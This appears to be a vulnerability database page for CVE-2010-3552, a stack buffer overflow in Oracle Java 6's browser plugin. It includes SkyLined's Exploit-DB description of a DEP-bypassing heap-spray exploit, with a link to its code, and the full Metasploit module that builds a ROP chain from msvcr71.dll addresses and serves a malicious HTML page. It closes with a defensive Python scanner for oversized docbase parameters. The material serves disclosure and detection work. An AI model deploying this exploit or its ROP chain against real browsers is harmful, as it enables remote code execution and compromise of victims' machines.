CVE-2010-3552 : Detail

94.71% V3
Network
2010-10-19 19h00 +00:00
2017-09-18 10h57 +00:00

CVE Description

Unspecified vulnerability in the New Java Plug-in component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-Other No information.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 15241

Publication date : 2010-10-12 22h00 +00:00
Author : Skylined
EDB Verified : Yes

Source: http://code.google.com/p/skylined/issues/detail?id=23

Internet Exploiter 12+DEP: Oracle Java 6 OBJECT tag "launchjnlp"/"docbase" param buffer overflow exploit.
Copyright (c) 2010 Berend-Jan "SkyLined" Wever <[email protected]>
All rights reserved.

This information is provided for academic purpose only.

This exploit targets a stack based buffer overflow in Oracle Java 6. The vulnerability has been confirmed in Update 20 and 21 and it probably exists in earlier versions as well. The overflow allows control over the EBP and EIP registers when the vulnerable code returns.

This exploit tries to bypass DEP using the "Havoc" mechanism first published at http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/. This is a combination of a heap spray and a ret-into-libc attack that tries to set the executable flag on a block of memory in the heap spray before executing it. After setting up the heap spray, the stack overflow in Java is used to overwrite EBP and EIP. EIP is pointed to any LEAVE, RET instruction sequence in the code section of any loaded module at an address that can be encoded in the buffer overflow string (characters [\x00\x80-\x9F] cannot be used!). The LEAVE instruction provides control over ESP, which makes the ret-into-libc attack possible.

The ret-into-libc attack causes consecutive calls to ZwProtectVirtualMemory in ntdll. Each call tries to change the memory protection flags for a memory region that should be covered by the heap spray and contain the shellcode. Multiple calls are needed because the base address of the memory block that contains the shellcode is not known. One call is made for each possible value, and therefore all but one of these calls should fail. After these calls, the ret-into-libc stack returns to the shellcode, which by now should be executable because of the one call to ZwProtectVirtualMemory that succeeded.

This exploit does not attempt to bypass ASLR. When testing on a target with ASLR enabled, you can provide the base address of ntdll by appending "?iNtDllImageBase=0xXXXXXXXX" to the URL. Alternatively, you could try to find a way to determine the base address of ntdll automatically or do a brute-force attack that tries all ~256 possible values (hint, hint :D).

This exploit has been tested successfully on Windows XP sp3 en-us (x86), Windows Vista sp2 en-us (x86) and Windows 7 en-us (x64) and with MSIE 6.0, 7.0 and 8.0 using Java 6 Update 21.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of the contributors may be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15241.zip (iExploit12-DEP.zip)

Exploit Database EDB-ID : 16587

Publication date : 2011-01-07 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: java_docbase_bof.rb 11513 2011-01-08 00:25:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sun Java Runtime New Plugin docbase Buffer Overflow',
      'Description'    => %q{
          This module exploits a flaw in the new plugin component of the Sun Java
        Runtime Environment before v6 Update 22. By specifying specific parameters
        to the new plugin, an attacker can cause a stack-based buffer overflow and
        execute arbitrary code.

        When the new plugin is invoked with a "launchjnlp" parameter, it will copy
        the contents of the "docbase" parameter to a stack-buffer using the
        "sprintf" function. A string of 396 bytes is enough to overflow the 256 byte
        stack buffer and overwrite some local variables as well as the saved return
        address.

        NOTE: The string being copied is first passed through the
        "WideCharToMultiByte". Due to this, only characters which have a valid
        localized multibyte representation are allowed. Invalid characters will be
        replaced with question marks ('?').

        This vulnerability was originally discovered independently by both Stephen
        Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't
        been done, all versions since version 6 Update 10 are believed to be
        affected by this vulnerability.

        This vulnerability was patched as part of the October 2010 Oracle Patch
        release.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'jduck',
      'Version'        => '$Revision: 11513 $',
      'References'     =>
        [
          [ 'CVE', '2010-3552' ],
          [ 'OSVDB', '68873' ],
          [ 'BID', '44023' ],
          [ 'URL', 'http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-206/' ],
          [ 'URL', 'http://code.google.com/p/skylined/issues/detail?id=23' ],
          [ 'URL', 'http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html' ],
        ],
      'Platform'       => 'win',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          # The double quote is due to the html, the rest due to utf8 conversion crap.
          'BadChars' => "\x00\x22" + (0x80..0x9f).to_a.pack('C*'),
          'DisableNops' => true,
          #'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EAX',
            }
        },
      'Targets'        =>
        [
          # Tested OK on:
          # JRE 6u21 on XPSP3 and Win7-RTM
          # JRE 6u18 on XPSP3 (ugly dialog on IE8)
          # JRE 6u11 on XPSP3 (ugly dialog on IE8)
          [ 'Windows Universal (msvcr71.dll ROP)', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 12 2010'
    ))
  end

  def on_request_uri(cli, request)
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}")

    # ActiveX params
    clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
    var_obj = rand_text_alpha(8+rand(8))

    # These addresses are from the bundled msvcr71.dll from JRE 6u21
=begin
7c340000 7c396000   MSVCR71    (export symbols)   C:\Program Files\Java\jre6\bin\MSVCR71.dll
    Loaded symbol image file: C:\Program Files\Java\jre6\bin\MSVCR71.dll
    Image path: C:\Program Files\Java\jre6\bin\MSVCR71.dll
    Image name: MSVCR71.dll
    Timestamp:        Fri Feb 21 07:42:20 2003 (3E561EAC)
    CheckSum:         0005F1E9
    ImageSize:        00056000
    File version:     7.10.3052.4
    Product version:  7.10.3052.4
=end
    base = 0x7c340000
    rva = {
      'scratch'     => 0x4b170,          # Scratch space..
      'scratch2'    => 0x4b170 - 0x10,   # Scratch space..
      'import_VA'   => 0x3a08c - 0x58,   # The import address of HeapCreate (less 0x58, avoid badchars)
      'add_58_eax'  => 0xd05e,   # add eax, 0x58 / ret
      'pop_eax'     => 0x4cc1,   # pop eax / ret
      'deref_eax'   => 0x130ea,  # mov eax, [eax] / ret
      'deref_eax4'  => 0xe72b,   # mov eax, [eax+4] / ret
      'jmp_eax'     => 0x13ac,   # push eax / ret
      'jmp_ecx'     => 0x6b0e,   # jmp ecx
      'pop_edx'     => 0x5937,   # pop edx / ret
      'adjust_eax'  => 0x32ef8,  # add eax, 0x80bf / add dh, dh / ret
      'rep_movsd'   => 0x363f,   # rep movsd / pop edi / pop esi / sub eax, eax / ret
      'esp_to_esi'  => 0x32f4f,  # push esp / and al, 0x10 / mov [edx], ecx / pop esi / ret
      'switcheroo'  => 0x3427,   # mov ecx, eax / mov eax, esi / pop esi / ret 0x10
      'st_eax_ecx'  => 0x103c8,  # mov [ecx], eax / ret
      'xor_ecx'     => 0x1aa5f,  # xor ecx, ecx / mov [eax+0xc], ecx / ret 4
      'set_ecx_fd'  => 0x1690b,  # mov cl, 0xfe / dec ecx / ret
    }

    extra_insn = 'nop'
    #extra_insn = 'int 3'
    single_op = Metasm::Shellcode.assemble(Metasm::Ia32.new, <<-EOS).encode_string
      #{extra_insn}
      push ecx
      pop edi
      ret
    EOS

    # This is the ROP stack.
    stack = [
      # Load HeapCreate addr from IAT
      'pop_eax',
      0x41414141, # unused space..
      0x41414141,
      0x41414141,
      0x41414141,
      'import_VA', # becomes eax
      'add_58_eax',
      'deref_eax',

      # call HeapCreate
      'jmp_eax',
      'adjust_eax', # eip after HeapCreate
      0x01040110,   # flOptions (gets & with 0x40005)
      0x01010101,   # dwInitialSize
      0x01010101,   # dwMaximumSize

      # Move esp into esi
      'pop_edx',
      'scratch', # becomes edx
      'esp_to_esi',

      # Store a single-dword stub to our buffer
      'switcheroo',
      single_op.unpack('V').first, # becomes esi/eax
      'deref_eax4',
      0x41414141, # more unused space..
      0x41414141,
      0x41414141,
      0x41414141,
      'st_eax_ecx',

      # Call our dword-stub
      'jmp_ecx',

      # Re-load ESP and save our Heap address to scratch (edx)
      'esp_to_esi',

      # Set ecx to something sane (for memcpy)
      'pop_eax',
      'scratch2',
      'xor_ecx',
      'set_ecx_fd',
      0x41414141, # skipped by ret 0x4

      # Do the memcpy!
      'rep_movsd',
      0x41414141, # becomes edi
      0x41414141, # becomes esi

      # Re-load our Heap pointer
      'pop_eax',
      'scratch',
      'deref_eax',

      # Adjust it to skip the non-payload parts
      'add_58_eax',

      # Execute it !
      'jmp_eax',

      # BOOO!
      0x41414141
    ]

    # Replace unused entries with randomness
    stack = stack.map { |el|
      if el.kind_of? String
        base + rva[el]
      elsif el == 0x41414141
        rand_text(4).unpack('V').first
      else
        el
      end
    }.pack('V*')

    # Create the overflow buffer
    docbase = rand_text(392)
    docbase << stack
    docbase << rand_text(584 - docbase.length)
    docbase << payload.encoded

    # Generate the html page that will trigger the vuln.
    html = <<-EOS
<html>
<body>Please wait...
<object id="#{var_obj}" classid="clsid:#{clsid}" width="0" height="0">
<PARAM name="launchjnlp" value="1">
<PARAM name="docbase" value="#{docbase}">
</object>
<embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="#{docbase}" />
</body>
</html>
EOS

    # Pow.
    send_response_html(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
  end

end
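
As an added defender-side example (not part of the CVE record, the Exploit-DB entry or the Metasploit module), the following Python scanner flags HTML that hands the legacy Java browser plugin a "launchjnlp" parameter together with a "docbase" value longer than the 256-byte stack buffer the module text describes, via either the <object>/<param> form or the <embed> form shown in the module's HTML. The CLSID, the applet MIME type, the parameter names and the 256-byte threshold come from the page; the scanner, its function names, the constructed sample documents and the decision to measure character length rather than post-conversion byte length are my own assumptions.

```python
"""Flag HTML that hands the Java plugin a launchjnlp/docbase pair with an
oversized docbase (CVE-2010-3552 pattern). Added detection example; not part
of the CVE record or the Metasploit module. Sample inputs are constructed."""
from html.parser import HTMLParser

# Plugin CLSID and applet MIME type as used in the module's HTML (from the page).
JAVA_PLUGIN_CLSID = "CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"
JAVA_APPLET_TYPE = "application/x-java-applet"
# Size of the stack buffer sprintf() writes into, per the module description.
# Assumption: we compare character length; the plugin converts the string with
# WideCharToMultiByte first, so byte length on the target may differ slightly.
DOCBASE_LIMIT = 256


class JavaDocbaseScanner(HTMLParser):
    """Collect (element, docbase_length) for every Java plugin invocation that
    sets launchjnlp and carries a docbase longer than DOCBASE_LIMIT."""

    def __init__(self):
        super().__init__()
        self._in_java_object = False
        self._params = {}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values keep their case.
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            self._in_java_object = (
                JAVA_PLUGIN_CLSID.lower() in a.get("classid", "").lower()
                or a.get("type", "").lower() == JAVA_APPLET_TYPE
            )
            self._params = {}
        elif tag == "param" and self._in_java_object:
            self._params[a.get("name", "").lower()] = a.get("value", "")
        elif tag == "embed" and a.get("type", "").lower() == JAVA_APPLET_TYPE:
            # <embed .../> triggers handle_starttag via handle_startendtag.
            self._record("embed", a)

    def handle_endtag(self, tag):
        if tag == "object" and self._in_java_object:
            self._record("object", self._params)
            self._in_java_object = False

    def _record(self, via, attrs):
        if "launchjnlp" in attrs and len(attrs.get("docbase", "")) > DOCBASE_LIMIT:
            self.findings.append((via, len(attrs["docbase"])))


def scan_html(html):
    """Return a list of (element, docbase_length) findings; [] means nothing
    in the document matches the oversized-docbase pattern."""
    parser = JavaDocbaseScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed samples: a legitimate-looking short docbase and an oversized one
# in both the <object>/<param> and <embed> forms.
BENIGN = (
    '<object classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA">'
    '<param name="launchjnlp" value="1">'
    '<param name="docbase" value="http://intranet.example/app/">'
    '</object>'
)
SUSPICIOUS = (
    '<object classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0">'
    '<PARAM name="launchjnlp" value="1">'
    '<PARAM name="docbase" value="' + "A" * 600 + '">'
    '</object>'
    '<embed type="application/x-java-applet" launchjnlp="1" docbase="' + "A" * 600 + '" />'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_html(doc))
```

The threshold deliberately sits at the buffer size rather than at the 396 bytes the module says is enough to reach the return address, so that any docbase that would already overrun the buffer is reported; tune it upward if legitimate JNLP URLs in your environment are long.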

Products Mentioned

Configuration 0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

References

http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.redhat.com/support/errata/RHSA-2010-0770.html
Tags : vendor-advisory, x_refsource_REDHAT